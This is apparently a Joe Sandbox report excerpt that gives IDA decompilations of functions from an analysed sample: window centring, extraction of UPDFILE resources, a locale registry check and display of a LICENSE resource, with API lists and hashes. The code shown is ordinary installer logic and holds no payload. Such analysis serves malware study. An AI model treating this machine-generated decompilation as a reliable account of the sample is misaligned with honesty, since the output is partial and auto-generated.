                                                                                                                                                                                                    • IsDBCSLeadByte.KERNEL32(00000000), ref: 00132AF2
                                                                                                                                                                                                    • CharNextA.USER32(?), ref: 00132B12
                                                                                                                                                                                                    • CharUpperA.USER32 ref: 00132B1E
                                                                                                                                                                                                    • CharPrevA.USER32(?,?), ref: 00132B55
                                                                                                                                                                                                    • CharNextA.USER32(?), ref: 00132BD4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 571164536-0
                                                                                                                                                                                                    • Opcode ID: 9a1bb4da358f0f66646059fef5e6c64082bc4cf65b62a25acea30e8922a44cb3
                                                                                                                                                                                                    • Instruction ID: 352b407d5c53ff6d282dae17f09eaa34abc5813b50fa7f47beea17352eceb9bb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a1bb4da358f0f66646059fef5e6c64082bc4cf65b62a25acea30e8922a44cb3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68414734604285AFDF25AF349C54AFDBFA99F52310F0440DAE8C683606DB758E86CBA1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                    			E001343D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				struct tagRECT _v24;
                                                                                                                                                                                                    				struct tagRECT _v40;
                                                                                                                                                                                                    				struct HWND__* _v44;
                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                    				int _v52;
                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                    				int _v60;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                                                    				void* _t53;
                                                                                                                                                                                                    				intOrPtr _t56;
                                                                                                                                                                                                    				int _t59;
                                                                                                                                                                                                    				struct HWND__* _t63;
                                                                                                                                                                                                    				struct HWND__* _t67;
                                                                                                                                                                                                    				struct HWND__* _t68;
                                                                                                                                                                                                    				struct HDC__* _t69;
                                                                                                                                                                                                    				int _t72;
                                                                                                                                                                                                    				signed int _t74;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t63 = __edx;
                                                                                                                                                                                                    				_t29 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                    				_t68 = __edx;
                                                                                                                                                                                                    				_v44 = __ecx;
                                                                                                                                                                                                    				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                    				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                    				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                    				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                    				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                    				_t69 = GetDC(_v44);
                                                                                                                                                                                                    				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                    				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                    				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                    				_t56 = _v48;
                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                    				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                    				_t67 = 0;
                                                                                                                                                                                                    				if(_t72 >= 0) {
                                                                                                                                                                                                    					_t63 = _v52;
                                                                                                                                                                                                    					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                    						_t72 = _t63 - _t56;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t72 = _t67;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                    				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                    				if(_t59 >= 0) {
                                                                                                                                                                                                    					_t63 = _v60;
                                                                                                                                                                                                    					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                    						_t59 = _t63 - _t53;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t59 = _t67;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00136CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                    			}
























                                                                                                                                                                                                    0x001343d0
                                                                                                                                                                                                    0x001343d8
                                                                                                                                                                                                    0x001343df
                                                                                                                                                                                                    0x001343e6
                                                                                                                                                                                                    0x001343ec
                                                                                                                                                                                                    0x001343f1
                                                                                                                                                                                                    0x00134400
                                                                                                                                                                                                    0x00134403
                                                                                                                                                                                                    0x0013440b
                                                                                                                                                                                                    0x00134420
                                                                                                                                                                                                    0x00134429
                                                                                                                                                                                                    0x00134437
                                                                                                                                                                                                    0x00134444
                                                                                                                                                                                                    0x00134447
                                                                                                                                                                                                    0x0013444d
                                                                                                                                                                                                    0x00134454
                                                                                                                                                                                                    0x0013445b
                                                                                                                                                                                                    0x00134460
                                                                                                                                                                                                    0x00134461
                                                                                                                                                                                                    0x00134467
                                                                                                                                                                                                    0x0013446f
                                                                                                                                                                                                    0x00134473
                                                                                                                                                                                                    0x00134473
                                                                                                                                                                                                    0x00134463
                                                                                                                                                                                                    0x00134463
                                                                                                                                                                                                    0x00134463
                                                                                                                                                                                                    0x0013447a
                                                                                                                                                                                                    0x00134481
                                                                                                                                                                                                    0x00134484
                                                                                                                                                                                                    0x0013448a
                                                                                                                                                                                                    0x00134492
                                                                                                                                                                                                    0x00134496
                                                                                                                                                                                                    0x00134496
                                                                                                                                                                                                    0x00134486
                                                                                                                                                                                                    0x00134486
                                                                                                                                                                                                    0x00134486
                                                                                                                                                                                                    0x001344b8

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 001343F1
                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0013440B
                                                                                                                                                                                                    • GetDC.USER32(?), ref: 00134423
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0013442E
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0013443A
                                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00134447
                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001), ref: 001344A2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2212493051-0
                                                                                                                                                                                                    • Opcode ID: df1e52ce73fe13dc9beef34a362181bb21c8ae0289d1b4f13af8dc8cbe28f50f
                                                                                                                                                                                                    • Instruction ID: adb71d80318d26b211c2474ec0a9adfaa30c0adb796e4d7ee637f6fa59813547
                                                                                                                                                                                                    • Opcode Fuzzy Hash: df1e52ce73fe13dc9beef34a362181bb21c8ae0289d1b4f13af8dc8cbe28f50f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1310972E00119AFCB14CFB8DD899EEBBB9EF89310F554169F805B7250DB70AD458B60
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                    			E00136298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                    				struct HINSTANCE__* _v36;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t16;
                                                                                                                                                                                                    				struct HRSRC__* _t21;
                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                    				struct HINSTANCE__* _t36;
                                                                                                                                                                                                    				intOrPtr* _t40;
                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                    				intOrPtr* _t44;
                                                                                                                                                                                                    				intOrPtr* _t45;
                                                                                                                                                                                                    				void* _t47;
                                                                                                                                                                                                    				signed int _t50;
                                                                                                                                                                                                    				struct HINSTANCE__* _t51;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t44 = __edx;
                                                                                                                                                                                                    				_t16 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                    				_t46 = 0;
                                                                                                                                                                                                    				_v32 = __ecx;
                                                                                                                                                                                                    				_v36 = 0;
                                                                                                                                                                                                    				_t36 = 1;
                                                                                                                                                                                                    				E0013171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					_t51 = _t51 + 0x10;
                                                                                                                                                                                                    					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                    					if(_t21 == 0) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                    					if(_t45 == 0) {
                                                                                                                                                                                                    						 *0x139124 = 0x80070714;
                                                                                                                                                                                                    						_t36 = _t46;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                    						_t44 = _t5;
                                                                                                                                                                                                    						_t40 = _t44;
                                                                                                                                                                                                    						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                    						_t47 = _t6;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t26 =  *_t40;
                                                                                                                                                                                                    							_t40 = _t40 + 1;
                                                                                                                                                                                                    						} while (_t26 != 0);
                                                                                                                                                                                                    						_t41 = _t40 - _t47;
                                                                                                                                                                                                    						_t46 = _t51;
                                                                                                                                                                                                    						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                    						 *0x13a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                    						_t30 = _v32();
                                                                                                                                                                                                    						if(_t51 != _t51) {
                                                                                                                                                                                                    							asm("int 0x29");
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_push(_t45);
                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                    							_t36 = 0;
                                                                                                                                                                                                    							FreeResource(??);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							FreeResource();
                                                                                                                                                                                                    							_v36 = _v36 + 1;
                                                                                                                                                                                                    							E0013171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                    							_t46 = 0;
                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					return E00136CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				goto L12;
                                                                                                                                                                                                    			}






















                                                                                                                                                                                                    0x00136298
                                                                                                                                                                                                    0x001362a0
                                                                                                                                                                                                    0x001362a7
                                                                                                                                                                                                    0x001362ad
                                                                                                                                                                                                    0x001362af
                                                                                                                                                                                                    0x001362bb
                                                                                                                                                                                                    0x001362c3
                                                                                                                                                                                                    0x001362c4
                                                                                                                                                                                                    0x0013633b
                                                                                                                                                                                                    0x0013633b
                                                                                                                                                                                                    0x00136345
                                                                                                                                                                                                    0x0013634d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001362da
                                                                                                                                                                                                    0x001362de
                                                                                                                                                                                                    0x0013635f
                                                                                                                                                                                                    0x00136369
                                                                                                                                                                                                    0x001362e0
                                                                                                                                                                                                    0x001362e0
                                                                                                                                                                                                    0x001362e0
                                                                                                                                                                                                    0x001362e3
                                                                                                                                                                                                    0x001362e5
                                                                                                                                                                                                    0x001362e5
                                                                                                                                                                                                    0x001362e8
                                                                                                                                                                                                    0x001362e8
                                                                                                                                                                                                    0x001362ea
                                                                                                                                                                                                    0x001362eb
                                                                                                                                                                                                    0x001362ef
                                                                                                                                                                                                    0x001362f1
                                                                                                                                                                                                    0x001362f3
                                                                                                                                                                                                    0x00136302
                                                                                                                                                                                                    0x00136308
                                                                                                                                                                                                    0x0013630d
                                                                                                                                                                                                    0x00136314
                                                                                                                                                                                                    0x00136314
                                                                                                                                                                                                    0x00136316
                                                                                                                                                                                                    0x00136319
                                                                                                                                                                                                    0x00136355
                                                                                                                                                                                                    0x00136357
                                                                                                                                                                                                    0x0013631b
                                                                                                                                                                                                    0x0013631b
                                                                                                                                                                                                    0x00136331
                                                                                                                                                                                                    0x00136334
                                                                                                                                                                                                    0x00136339
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00136339
                                                                                                                                                                                                    0x00136319
                                                                                                                                                                                                    0x0013636b
                                                                                                                                                                                                    0x0013637d
                                                                                                                                                                                                    0x0013637d
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0013171E: _vsnprintf.MSVCRT ref: 00131750
                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,001351CA,00000004,00000024,00132F71,?,00000002,00000000), ref: 001362CD
                                                                                                                                                                                                    • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,001351CA,00000004,00000024,00132F71,?,00000002,00000000), ref: 001362D4
                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,001351CA,00000004,00000024,00132F71,?,00000002,00000000), ref: 0013631B
                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00136345
                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,001351CA,00000004,00000024,00132F71,?,00000002,00000000), ref: 00136357
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                    • String ID: UPDFILE%lu
                                                                                                                                                                                                    • API String ID: 2922116661-2329316264
                                                                                                                                                                                                    • Opcode ID: fcc5cbd82b55aeed3a213885cdde1ae2543d1d49e7c4e7d9dd4e83fe4c00c486
                                                                                                                                                                                                    • Instruction ID: acd16235f833081d59427b5b19d0cab732a5c720b4bd6c6edfa0c023eb482e74
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fcc5cbd82b55aeed3a213885cdde1ae2543d1d49e7c4e7d9dd4e83fe4c00c486
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF21F171A00219BBDB149FA48C459BFBB7CFF48710F044129FA46A3641DB759D468BE0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                    			E0013681F(void* __ebx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                    				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                    				void* _v172;
                                                                                                                                                                                                    				int* _v176;
                                                                                                                                                                                                    				int _v180;
                                                                                                                                                                                                    				int _v184;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t19;
                                                                                                                                                                                                    				long _t31;
                                                                                                                                                                                                    				signed int _t35;
                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                    				intOrPtr _t41;
                                                                                                                                                                                                    				signed int _t44;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t36 = __ebx;
                                                                                                                                                                                                    				_t19 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                    				_t41 =  *0x1381d8; // 0x0
                                                                                                                                                                                                    				_t43 = 0;
                                                                                                                                                                                                    				_v180 = 0xc;
                                                                                                                                                                                                    				_v176 = 0;
                                                                                                                                                                                                    				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                    					 *0x1381d8 = 0;
                                                                                                                                                                                                    					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                    					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                    						L12:
                                                                                                                                                                                                    						_t41 =  *0x1381d8; // 0x0
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t41 = 1;
                                                                                                                                                                                                    						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                    							goto L12;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t31 = RegQueryValueExA(_v172, 0x131140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                    							_t43 = _t31;
                                                                                                                                                                                                    							RegCloseKey(_v172);
                                                                                                                                                                                                    							if(_t31 != 0) {
                                                                                                                                                                                                    								goto L12;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t40 =  &_v176;
                                                                                                                                                                                                    								if(E001366F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                    									goto L12;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                    									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                    										 *0x1381d8 = _t41;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										goto L12;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00136CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                    			}


















                                                                                                                                                                                                    0x0013681f
                                                                                                                                                                                                    0x0013682a
                                                                                                                                                                                                    0x00136831
                                                                                                                                                                                                    0x00136836
                                                                                                                                                                                                    0x0013683c
                                                                                                                                                                                                    0x0013683e
                                                                                                                                                                                                    0x00136848
                                                                                                                                                                                                    0x00136851
                                                                                                                                                                                                    0x0013685d
                                                                                                                                                                                                    0x00136864
                                                                                                                                                                                                    0x00136876
                                                                                                                                                                                                    0x0013693a
                                                                                                                                                                                                    0x0013693a
                                                                                                                                                                                                    0x0013687c
                                                                                                                                                                                                    0x0013687e
                                                                                                                                                                                                    0x00136885
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001368d6
                                                                                                                                                                                                    0x001368f4
                                                                                                                                                                                                    0x00136900
                                                                                                                                                                                                    0x00136902
                                                                                                                                                                                                    0x0013690a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013690c
                                                                                                                                                                                                    0x0013690c
                                                                                                                                                                                                    0x0013691c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013691e
                                                                                                                                                                                                    0x00136924
                                                                                                                                                                                                    0x0013692b
                                                                                                                                                                                                    0x00136932
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013692b
                                                                                                                                                                                                    0x0013691c
                                                                                                                                                                                                    0x0013690a
                                                                                                                                                                                                    0x00136885
                                                                                                                                                                                                    0x00136876
                                                                                                                                                                                                    0x00136951

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0013686E
                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000004A), ref: 001368A7
                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 001368CC
                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00131140,00000000,?,?,0000000C), ref: 001368F4
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00136902
                                                                                                                                                                                                      • Part of subcall function 001366F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0013691A), ref: 00136741
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Control Panel\Desktop\ResourceLocale, xrefs: 001368C2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                    • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                    • API String ID: 3346862599-1109908249
                                                                                                                                                                                                    • Opcode ID: a059a654507556c8874b22ef63e4ee47528496e5e7004841569e57a468bd1a2b
                                                                                                                                                                                                    • Instruction ID: bcff2a611829ac62bb52da99d563769090a7f9b51c39e04d05465d402e119405
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a059a654507556c8874b22ef63e4ee47528496e5e7004841569e57a468bd1a2b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85316F71A00318AFDB21DF11CC45BAAB7B8EF45768F1041A5E94DA6150DBB09E89CF52
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00133A3F(void* __eflags) {
                                                                                                                                                                                                    				void* _t3;
                                                                                                                                                                                                    				void* _t9;
                                                                                                                                                                                                    				CHAR* _t16;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t16 = "LICENSE";
                                                                                                                                                                                                    				_t1 = E0013468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                    				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                    				 *0x138d4c = _t3;
                                                                                                                                                                                                    				if(_t3 != 0) {
                                                                                                                                                                                                    					_t19 = _t16;
                                                                                                                                                                                                    					if(E0013468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                    						if(lstrcmpA( *0x138d4c, "<None>") == 0) {
                                                                                                                                                                                                    							LocalFree( *0x138d4c);
                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                    							 *0x139124 = 0;
                                                                                                                                                                                                    							return 1;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t9 = E00136517(_t19, 0x7d1, 0, E00133100, 0, 0);
                                                                                                                                                                                                    						LocalFree( *0x138d4c);
                                                                                                                                                                                                    						if(_t9 != 0) {
                                                                                                                                                                                                    							goto L9;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *0x139124 = 0x800704c7;
                                                                                                                                                                                                    						L2:
                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					E001344B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					LocalFree( *0x138d4c);
                                                                                                                                                                                                    					 *0x139124 = 0x80070714;
                                                                                                                                                                                                    					goto L2;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				E001344B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    				 *0x139124 = E00136285();
                                                                                                                                                                                                    				goto L2;
                                                                                                                                                                                                    			}






                                                                                                                                                                                                    0x00133a46
                                                                                                                                                                                                    0x00133a57
                                                                                                                                                                                                    0x00133a5d
                                                                                                                                                                                                    0x00133a63
                                                                                                                                                                                                    0x00133a6a
                                                                                                                                                                                                    0x00133a91
                                                                                                                                                                                                    0x00133a9a
                                                                                                                                                                                                    0x00133ad8
                                                                                                                                                                                                    0x00133b13
                                                                                                                                                                                                    0x00133b19
                                                                                                                                                                                                    0x00133b1b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133b21
                                                                                                                                                                                                    0x00133ae7
                                                                                                                                                                                                    0x00133af4
                                                                                                                                                                                                    0x00133afc
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133afe
                                                                                                                                                                                                    0x00133a87
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133a87
                                                                                                                                                                                                    0x00133aa8
                                                                                                                                                                                                    0x00133ab3
                                                                                                                                                                                                    0x00133ab9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133ab9
                                                                                                                                                                                                    0x00133a78
                                                                                                                                                                                                    0x00133a82
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0013468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346A0
                                                                                                                                                                                                      • Part of subcall function 0013468F: SizeofResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346A9
                                                                                                                                                                                                      • Part of subcall function 0013468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346C3
                                                                                                                                                                                                      • Part of subcall function 0013468F: LoadResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346CC
                                                                                                                                                                                                      • Part of subcall function 0013468F: LockResource.KERNEL32(00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346D3
                                                                                                                                                                                                      • Part of subcall function 0013468F: memcpy_s.MSVCRT ref: 001346E5
                                                                                                                                                                                                      • Part of subcall function 0013468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001346EF
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00132F64,?,00000002,00000000), ref: 00133A5D
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00133AB3
                                                                                                                                                                                                      • Part of subcall function 001344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00134518
                                                                                                                                                                                                      • Part of subcall function 001344B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00134554
